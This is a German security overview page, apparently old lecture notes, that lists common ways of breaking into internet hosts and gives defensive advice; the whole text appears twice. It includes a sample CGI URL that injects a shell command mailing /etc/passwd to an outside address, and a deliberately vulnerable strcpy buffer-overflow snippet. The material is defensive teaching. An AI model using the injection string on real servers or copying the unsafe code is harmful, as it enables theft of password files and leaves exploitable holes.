![[HaBo]](/styles/default/logoklein.png){kind=small}
"Wie mache ich einen Rechner im Internet auf?"
====================================
Penetrationsmöglichkeiten
-------------------------
<> Klassen von Penetrationen:
- - - - - - - - - - - - - - - - -
- Fehlkonfiguration, nicht abgeschaltete Dienste
- Die größte einzelne Ursache für Einbrüche
- Auch: Sicherheitspatches des Herstellers nicht eingespielt
- Meistens unnötige Dienste nicht abgeschaltet
- Firewall(s)- und Routerkonfigurationen fehlerhaft
- SMTP Relaying nicht abgeschaltet (Spam)
- Inhärent unsichere Dienste (NFS, NIS, telnet, rlogin)
- Buffer Overflow
void bla(char *s) { char buf[100]; strcpy(buf,s); }
- Sehr häufiger Fehler!
- Teilweise auch in Library-Funktionen ( z.B. syslog() )
- MS Exchange, wu-ftpd. Netscape, MSIE, sendmail, Outlook, Outlook Express, MS IIS, ...
- Metazeichen nicht escaped
http://www.site.com/search.cgi?what=bla;mail+/etc/passwd+me@here.com
- Wenn /bin/sh involviert ist ( system() ), müssen alle Metazeichen entfernt werden!
- Sendmail, Excite personal search extension, metamail, ...
- Whitelisten, nicht blacklisten
- Sehr viele Freeware-CGI-Perlscripte
- ::$DATA bei NT-Servern
- Passwörter gesnifft
- telnet
- Beliebte Ziele sind auch POP3 und IMAP, weil die gewöhnlich periodisch die
Paßwörter über das Netz broadcasten.
- Passwörter gecrackt
- Viele Fehler erlauben nicht, remote Code aus root auszuführen, aber man kann
damit /etc/passwd (oder die NIS-Map) lesen. Das reicht für einen Wörterbuchangriff auf die Passwort-Liste.
- Der empfohlene Password-Cracker ist "John the Ripper"
- TCP-Hijacking
Man kann auf der Route einer TCP-Verbindung die Verbindung übernehmen,
was besonders bei One-Time-Password schemas vorteilhaft benutzt werden kann, um die
authentifizierte Verbindung zu übernehmen.
- Hintertüren
In letzter Zeit sind Hintertüren vor allem bei Routern aufgetaucht, aber
historisch gibt es sie auch in Form von Trojanischen Pferden (Back Orifice, Netbus)
und von frühen Unix- und VMS-Versionen gibt es auch Anekdoten.
<> Wie schützt man sich?
- - - - - - - - - - - - -
- Nicht auf die Firewall verlassen. Hosts zusätzlich absichern.
- Verbindungen verschlüsseln, ssh einsetzen
- Ständig Scans auf die Rechner machen
- open Source hilft gegen offensichtliche Hintertüren
- Keine Microsoft-Produkte einsetzen
- Passwörter periodisch selbst zu cracken versuchen
? HaBo-Security
====================================
Penetrationsmöglichkeiten
-------------------------
<> Klassen von Penetrationen:
- - - - - - - - - - - - - - - - -
- Fehlkonfiguration, nicht abgeschaltete Dienste
- Die größte einzelne Ursache für Einbrüche
- Auch: Sicherheitspatches des Herstellers nicht eingespielt
- Meistens unnötige Dienste nicht abgeschaltet
- Firewall(s)- und Routerkonfigurationen fehlerhaft
- SMTP Relaying nicht abgeschaltet (Spam)
- Inhärent unsichere Dienste (NFS, NIS, telnet, rlogin)
- Buffer Overflow
void bla(char *s) { char buf[100]; strcpy(buf,s); }
- Sehr häufiger Fehler!
- Teilweise auch in Library-Funktionen ( z.B. syslog() )
- MS Exchange, wu-ftpd. Netscape, MSIE, sendmail, Outlook, Outlook Express, MS IIS, ...
- Metazeichen nicht escaped
http://www.site.com/search.cgi?what=bla;mail+/etc/passwd+me@here.com
- Wenn /bin/sh involviert ist ( system() ), müssen alle Metazeichen entfernt werden!
- Sendmail, Excite personal search extension, metamail, ...
- Whitelisten, nicht blacklisten
- Sehr viele Freeware-CGI-Perlscripte
- ::$DATA bei NT-Servern
- Passwörter gesnifft
- telnet
- Beliebte Ziele sind auch POP3 und IMAP, weil die gewöhnlich periodisch die
Paßwörter über das Netz broadcasten.
- Passwörter gecrackt
- Viele Fehler erlauben nicht, remote Code aus root auszuführen, aber man kann
damit /etc/passwd (oder die NIS-Map) lesen. Das reicht für einen Wörterbuchangriff auf die Passwort-Liste.
- Der empfohlene Password-Cracker ist "John the Ripper"
- TCP-Hijacking
Man kann auf der Route einer TCP-Verbindung die Verbindung übernehmen,
was besonders bei One-Time-Password schemas vorteilhaft benutzt werden kann, um die
authentifizierte Verbindung zu übernehmen.
- Hintertüren
In letzter Zeit sind Hintertüren vor allem bei Routern aufgetaucht, aber
historisch gibt es sie auch in Form von Trojanischen Pferden (Back Orifice, Netbus)
und von frühen Unix- und VMS-Versionen gibt es auch Anekdoten.
<> Wie schützt man sich?
- - - - - - - - - - - - -
- Nicht auf die Firewall verlassen. Hosts zusätzlich absichern.
- Verbindungen verschlüsseln, ssh einsetzen
- Ständig Scans auf die Rechner machen
- open Source hilft gegen offensichtliche Hintertüren
- Keine Microsoft-Produkte einsetzen
- Passwörter periodisch selbst zu cracken versuchen
? HaBo-Security